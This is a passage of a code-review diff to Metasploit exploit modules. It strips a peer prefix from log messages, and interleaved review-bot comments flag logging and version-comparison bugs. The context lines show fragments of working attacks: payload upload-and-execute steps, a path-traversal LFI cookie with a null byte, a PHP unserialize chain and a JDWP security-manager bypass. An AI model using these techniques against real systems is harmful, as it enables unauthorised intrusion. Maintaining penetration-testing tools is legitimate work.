Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(uri, 'wizards', @payload_name), 'method' => 'GET' diff --git a/modules/exploits/multi/http/vbulletin_unserialize.rb b/modules/exploits/multi/http/vbulletin_unserialize.rb index 1238434ece..15f48e6c1a 100644 --- a/modules/exploits/multi/http/vbulletin_unserialize.rb +++ b/modules/exploits/multi/http/vbulletin_unserialize.rb 
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to inferprint the instance...") + print_status("Trying to inferprint the instance...") @my_target = target check_code = check @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:' chain << @my_target["chain"].length.to_s diff --git a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb index 9c4c7972c0..88d5e8285f 100644 --- a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb +++ b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb @@ -75,15 +75,15 @@ class Metasploit3 < Msf::Exploit::Remote def exploit jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") + print_status("Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload, 1) end diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index d8c06a41c1..6769172a7a 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb +++ b/modules/exploits/multi/http/vtiger_soap_upload.rb 
@@ -89,15 +89,15 @@ class Metasploit3 < Msf::Exploit::Remote soap = add_attachment_soap(file_name, php) res = send_soap_request(soap) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/ - print_good("#{peer} - Upload successfully uploaded") + print_good("Upload successfully uploaded") register_files_for_cleanup(file_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0) end diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index 41e4dfa4da..8531ee69dc 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote "form-data; name=\"file\"; filename=\"#{fname}\"" #Content Disposition ) - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/work/resultimage.php"), @@ -115,18 +115,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end @target_path = normalize_uri("#{base}/results/#{fname}") - print_status("#{peer} - Requesting #{@target_path}") + print_status("Requesting #{@target_path}") res = send_request_cgi({'uri'=>@target_path}) handler if res and res.code == 404 - print_error("#{peer} - Payload failed to upload") + print_error("Payload failed to upload") end end end 
diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 71c2f8d6eb..18503fd504 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -209,13 +209,13 @@ class Metasploit3 < Msf::Exploit::Remote @base = normalize_uri(target_uri.path) @base << '/' if @base[-1, 1] != '/' - print_status("#{peer} - Getting cookie") + print_status("Getting cookie") cookie = get_cookie - print_status("#{peer} - Logging in") + print_status("Logging in") cred = login(cookie) - print_status("#{peer} - Triggering spam logging") + print_status("Triggering spam logging") inject_exec(cred) handler diff --git a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb index f58aa5b783..b22c77322b 100644 --- a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb +++ b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s - print_status("#{peer} - Uploading WAR file to #{tomcat_path}") + print_status("Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote } }) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful") + print_status("Upload appears to have been successful") else - print_error("#{peer} - Failed to upload, try again with a different path?") + print_error("Failed to upload, try again with a different path?") return false end 
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote Rex.sleep(2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb index c6861a0ea3..fcecbbebdf 100644 --- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb +++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote if fingerprint =~ /Data Protector A\.(\d+\.\d+)/ version = $1 - vprint_status("#{peer} - Windows / HP Data Protector version #{version} found") + vprint_status("Windows / HP Data Protector version #{version} found") elsif fingerprint =~ / INET/ - vprint_status("#{peer} - Linux / HP Data Protector found") + vprint_status("Linux / HP Data Protector found") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe 
@@ -106,25 +106,25 @@ class Metasploit3 < Msf::Exploit::Remote def exploit rand_exec = rand_text_alpha(8) - print_status("#{peer} - Leaking the HP Data Protector directory...") + print_status("Leaking the HP Data Protector directory...") leak = leak_hp_directory(rand_exec) dir = parse_dir(leak, rand_exec) if dir.nil? dir = default_hp_dir - print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}") + print_error("HP Data Protector dir not found, using the default #{dir}") else unless valid_target?(dir) - print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") + print_error("HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") end end if target.name =~ /Windows/ #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true}) - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_windows(payload.encoded, dir) else - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_linux(payload.encoded, dir) end end @@ -265,10 +265,10 @@ class Metasploit3 < Msf::Exploit::Remote def parse_dir(data, clue) if data && data =~ /The system cannot find the file specified\..*(.:\\.*)bin\\#{clue}/ dir = $1 - print_good("#{peer} - HP Data Protector directory found on #{dir}") + print_good("HP Data Protector directory found on #{dir}") elsif data && data =~ /\]\x00 (\/.*)lbin\/#{clue}\x00 \[\d\] No such file or directory/ dir = $1 - print_good("#{peer} - HP Data Protector directory found on #{dir}") + print_good("HP Data Protector directory found on #{dir}") else dir = nil end diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 3bd4d88285..2304aa8855 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb 
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -265,7 +265,7 @@ class Metasploit3 < Msf::Exploit::Remote nb_entries.times do |var| if var != 0 && var % 1000 == 0 - vprint_status("#{peer} - Parsed #{var} classes of #{nb_entries}") + vprint_status("Parsed #{var} classes of #{nb_entries}") end data = {} @@ -691,13 +691,13 @@ class Metasploit3 < Msf::Exploit::Remote path = temp_path || '/tmp/' payload_exe = "#{path}#{payload_exe}" if @os.downcase =~ /win/ - print_warning("#{peer} - #{@os} system detected but using Linux target...") + print_warning("#{@os} system detected but using Linux target...") end when 'win' path = temp_path || './' payload_exe = "#{path}#{payload_exe}.exe" unless @os.downcase =~ /win/ - print_warning("#{peer} - #{@os} system detected but using Windows target...") + print_warning("#{@os} system detected but using Windows target...") end end @@ -837,7 +837,7 @@ class Metasploit3 < Msf::Exploit::Remote # 2. Suspend the VM before setting the event suspend_vm - vprint_status("#{peer} - Setting 'step into' event in thread: #{t_id}") + vprint_status("Setting 'step into' event in thread: #{t_id}") step_info = format(@vars["objectid_size"], t_id) step_info << [STEP_MIN].pack('N') step_info << [STEP_INTO].pack('N') @@ -868,13 +868,13 @@ class Metasploit3 < Msf::Exploit::Remote value = get_value(sys_class["reftype_id"], sec_field) if(value == 0) - print_good("#{peer} - Security manager was not set") + print_good("Security manager was not set") else set_value(sys_class["reftype_id"], sec_field, 0) if get_value(sys_class["reftype_id"], sec_field) == 0 - print_good("#{peer} - Security manager has been disabled") + print_good("Security manager has been disabled") else - print_good("#{peer} - Security manager has not been disabled, trying anyway...") + print_good("Security manager has not been disabled, trying anyway...") end end end 
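Review bot: In java_jdwp_debugger.rb (@@ -868,13) the branch taken when the second `get_value` call is still non-zero logs `print_good("Security manager has not been disabled, trying anyway...")`, so a step that did not succeed is reported at the success level. The same file already uses `print_warning` for its OS/target mismatch messages (@@ -691,13). `print_warning("Security manager has not been disabled, trying anyway...")` would keep the log level in line with what happened. The enclosing method starts outside the hunk.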
@@ -884,7 +884,7 @@ class Metasploit3 < Msf::Exploit::Remote # 0. Fingerprinting OS fingerprint_os(thread_id) - vprint_status("#{peer} - Executing payload on \"#{@os}\", target version: #{version}") + vprint_status("Executing payload on \"#{@os}\", target version: #{version}") # 1. Prepares the payload payload_exe, pl_exe = setup_payload @@ -927,27 +927,27 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "JDWP Protocol not found") end - print_status("#{peer} - Retrieving the sizes of variable sized data types in the target VM...") + print_status("Retrieving the sizes of variable sized data types in the target VM...") get_sizes - print_status("#{peer} - Getting the version of the target VM...") + print_status("Getting the version of the target VM...") get_version - print_status("#{peer} - Getting all currently loaded classes by the target VM...") + print_status("Getting all currently loaded classes by the target VM...") get_all_classes - print_status("#{peer} - Getting all running threads in the target VM...") + print_status("Getting all running threads in the target VM...") get_all_threads - print_status("#{peer} - Setting 'step into' event...") + print_status("Setting 'step into' event...") r_id, t_id = set_step_event - print_status("#{peer} - Resuming VM and waiting for an event...") + print_status("Resuming VM and waiting for an event...") response = resume_vm unless parse_event(response, r_id, t_id) datastore['NUM_RETRIES'].times do |i| - print_status("#{peer} - Received #{i + 1} responses that are not a 'step into' event...") + print_status("Received #{i + 1} responses that are not a 'step into' event...") buf = read_reply break if parse_event(buf, r_id, t_id) 
@@ -957,14 +957,14 @@ class Metasploit3 < Msf::Exploit::Remote end end - vprint_status("#{peer} - Received matching event from thread #{t_id}") - print_status("#{peer} - Deleting step event...") + vprint_status("Received matching event from thread #{t_id}") + print_status("Deleting step event...") clear_event(EVENT_STEP, r_id) - print_status("#{peer} - Disabling security manager if set...") + print_status("Disabling security manager if set...") disable_sec_manager - print_status("#{peer} - Dropping and executing payload...") + print_status("Dropping and executing payload...") exec_payload(t_id) disconnect diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index d5221281f4..2823fe48f0 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb @@ -131,18 +131,18 @@ class Metasploit3 < Msf::Exploit::Remote @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}" connect - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") unless is_rmi? fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol") end - print_status("#{peer} - Discovering the JMXRMI endpoint...") + print_status("Discovering the JMXRMI endpoint...") mbean_server = discover_endpoint disconnect if mbean_server.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint") else - print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") + print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") end # First try to connect to the original RHOST, since the mbean address may be inaccessible 
@@ -157,20 +157,20 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server") end - print_status("#{peer} - Proceeding with handshake...") + print_status("Proceeding with handshake...") jmx_endpoint = handshake(mbean_server) if jmx_endpoint.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server") else - print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") + print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") end - print_status("#{peer} - Loading payload...") + print_status("Loading payload...") unless load_payload(jmx_endpoint) fail_with(Failure::Unknown, "#{peer} - Failed to load the payload") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_jmx_invoke( object_number: jmx_endpoint[:object_number], uid_number: jmx_endpoint[:uid].number, @@ -199,7 +199,7 @@ class Metasploit3 < Msf::Exploit::Remote return nil if ref.nil? unless ref[:object] == 'javax.management.remote.rmi.RMIServerImpl_Stub' - vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{ref[:object]}") + vprint_error("JMXRMI discovery returned unexpected object #{ref[:object]}") return nil end @@ -223,7 +223,7 @@ class Metasploit3 < Msf::Exploit::Remote ref = send_new_client(opts) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - JMXRMI discovery raised an exception of type #{e.message}") + vprint_error("JMXRMI discovery raised an exception of type #{e.message}") return nil end @@ -231,7 +231,7 @@ class Metasploit3 < Msf::Exploit::Remote end def load_payload(conn_stub) - vprint_status("#{peer} - Getting JMXPayload instance...") + vprint_status("Getting JMXPayload instance...") begin res = send_jmx_get_object_instance( 
@@ -244,10 +244,10 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::Rmi::Exception => e case e.message when 'javax.management.InstanceNotFoundException' - vprint_warning("#{peer} - JMXPayload instance not found, trying to load") + vprint_warning("JMXPayload instance not found, trying to load") return load_payload_from_url(conn_stub) else - vprint_error("#{peer} - getObjectInstance returned unexpected exception #{e.message}") + vprint_error("getObjectInstance returned unexpected exception #{e.message}") return false end end @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote end def load_payload_from_url(conn_stub) - vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...") + vprint_status("Creating javax.management.loading.MLet MBean...") begin res = send_jmx_create_mbean( @@ -272,23 +272,23 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::Rmi::Exception => e case e.message when 'javax.management.InstanceAlreadyExistsException' - vprint_good("#{peer} - javax.management.loading.MLet already exists") + vprint_good("javax.management.loading.MLet already exists") res = true when 'java.lang.SecurityException' - vprint_error("#{peer} - The provided user hasn't enough privileges") + vprint_error(" The provided user hasn't enough privileges") res = nil else - vprint_error("#{peer} - createMBean raised unexpected exception #{e.message}") + vprint_error("createMBean raised unexpected exception #{e.message}") res = nil end end if res.nil? - vprint_error("#{peer} - The request to createMBean failed") + vprint_error("The request to createMBean failed") return false end - vprint_status("#{peer} - Getting javax.management.loading.MLet instance...") + vprint_status("Getting javax.management.loading.MLet instance...") begin res = send_jmx_get_object_instance( object_number: conn_stub[:object_number], 
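Review bot: The new line in the `java.lang.SecurityException` branch of java_jmx_server.rb (@@ -272,23) keeps a stray leading space, `vprint_error(" The provided user hasn't enough privileges")`, apparently left over from cutting the peer prefix. Every other rewritten message in this file starts at the first character, so it should be `vprint_error("The provided user hasn't enough privileges")`. Anything that matches on the message text would otherwise see an inconsistent format for this one error.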
@@ -298,16 +298,16 @@ class Metasploit3 < Msf::Exploit::Remote name: 'DefaultDomain:type=MLet' ) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - getObjectInstance returned unexpected exception: #{e.message}") + vprint_error("getObjectInstance returned unexpected exception: #{e.message}") return false end if res.nil? - vprint_error("#{peer} - The request to GetObjectInstance failed") + vprint_error("The request to GetObjectInstance failed") return false end - vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") + vprint_status("Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") begin res = send_jmx_invoke( @@ -320,12 +320,12 @@ class Metasploit3 < Msf::Exploit::Remote args: { 'java.lang.String' => "#{get_uri}/mlet" } ) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - invoke() returned unexpected exception: #{e.message}") + vprint_error("invoke() returned unexpected exception: #{e.message}") return false end if res.nil? - vprint_error("#{peer} - The call to getMBeansFromURL failed") + vprint_error("The call to getMBeansFromURL failed") return false end diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index 90f87dea99..7e2133acab 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote def primer connect - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") send_header ack = recv_protocol_ack if ack.nil? @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote jar = rand_text_alpha(rand(8)+1) + '.jar' new_url = get_uri + '/' + jar - print_status("#{peer} - Sending RMI Call...") + print_status("Sending RMI Call...") dgc_interface_hash = calculate_interface_hash( [ { 
diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb index f35930adfb..0e39c322d6 100644 --- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb +++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.close - print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") + print_status("Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb index 4fdbb98670..1b2de6b94b 100644 --- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb +++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return Exploit::CheckCode::Unknown end @@ -87,9 +87,9 @@ class Metasploit3 < Msf::Exploit::Remote version = $2 build = $1 - vprint_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected") + vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected") else - vprint_status("#{peer} - Unexpected vmtadmin.cgi response") + vprint_status("Unexpected vmtadmin.cgi response") return Exploit::CheckCode::Unknown end @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return nil end 
@@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to execute payload") end - print_status("#{peer} - Blind Exploitation - unknown exploitation state") + print_status("Blind Exploitation - unknown exploitation state") return end diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index 8cb29c5e9f..99d0bc71fd 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb @@ -65,22 +65,22 @@ class Metasploit3 < Msf::Exploit::Remote # check for aa.php res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown elsif res.code == 404 - vprint_error("#{peer} - Could not find aa.php") + vprint_error("Could not find aa.php") return Exploit::CheckCode::Safe elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/ - vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.") + vprint_error("ActualAnalyzer is not installed. Try installing first.") return Exploit::CheckCode::Detected end # check version res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body - vprint_status("#{peer} - Found version: #{version}") + vprint_status("Found version: #{version}") if Gem::Version.new(version) <= Gem::Version.new('2.81') report_vuln( host: rhost, 
@@ -124,12 +124,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") + vprint_good("Found analytics host: #{analytics_host}") return analytics_host else - vprint_status("#{peer} - Could not find any hosts on view.php") + vprint_status("Could not find any hosts on view.php") end nil end @@ -146,12 +146,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") + vprint_good("Found analytics host: #{analytics_host}") return analytics_host else - vprint_status("#{peer} - Could not find any hosts on code.php") + vprint_status("Could not find any hosts on code.php") end nil end @@ -184,12 +184,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 200 && res.body =~ />Login</ - vprint_status("#{peer} - Login failed.") + vprint_status("Login failed.") elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") - print_good("#{peer} - Login successful! (#{user}:#{pass})") + vprint_good("Found analytics host: #{analytics_host}") + print_good("Login successful! (#{user}:#{pass})") service_data = { address: Rex::Socket.getaddress(rhost, true), port: rport, 
@@ -215,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote create_credential_login(login_data) return analytics_host else - vprint_status("#{peer} - Could not find any hosts on admin.php") + vprint_status("Could not find any hosts on admin.php") end nil end @@ -230,10 +230,10 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out") elsif res.code == 302 && res.headers['Content-Type'] =~ /image/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") return true elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/ - vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.") + vprint_status("Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.") elsif res.code == 200 && res.body =~ /Admin area<\/title>/ fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.") else @@ -257,7 +257,7 @@ class Metasploit3 < Msf::Exploit::Remote end analytics_hosts.uniq.each do |host| next if host.nil? - vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") + vprint_status("Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") break if execute_command(payload.encoded, analytics_host: host) end end diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index 9b029120b6..c97f321c9a 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + print_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', 
@@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "10.0.10" return Exploit::CheckCode::Safe end # Check for vulnerable component - vprint_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate") + print_status("Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "scripts", "upload.php"), @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup("/tmp/ApplianceUpdate") - print_status("#{peer} - Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") + print_status("Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'GET', 'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" }, @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, probably the exploit failed") + print_error("Unexpected response, probably the exploit failed") end end diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index 55abc7908c..2c98d91f63 100644 --- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb 
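Review bot: The verdict in arkeia_upload_exec.rb (@@ -69,14) is decided by `if version > "10.0.10"`, which compares Strings lexicographically, so "10.0.9" sorts above "10.0.10" and would be reported as Safe. Other modules in this patch compare with `Gem::Version`, and the same form fits here: `if Gem::Version.new(version) > Gem::Version.new('10.0.10')`. This assumes `version` is a dotted numeric string, since it is assigned outside the hunk. clipbucket_upload_exec.rb (@@ -67,7) has the same pattern with `version > "2.6"`.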
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote # Check version peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "2.6" return Exploit::CheckCode::Safe @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php" - print_status("#{peer} - Uploading payload [ #{payload_name} ]") + print_status("Uploading payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"), @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" ) + print_status("Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" ) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name) @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, probably the exploit failed") + print_error("Unexpected response, probably the exploit failed") end end diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index 10291ae9a6..d39e728937 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb 
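Review bot: `check` (@@ -54,7) and `exploit` (@@ -82,7) in clipbucket_upload_exec.rb still assign `peer = "#{rhost}:#{rport}"` immediately before messages that no longer interpolate it. If nothing later in those methods reads it (both bodies continue outside the hunks), the local is dead. It also appears to shadow the `peer` helper that the other modules in this patch call without defining. Dropping the two assignments would match the rest of the change.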
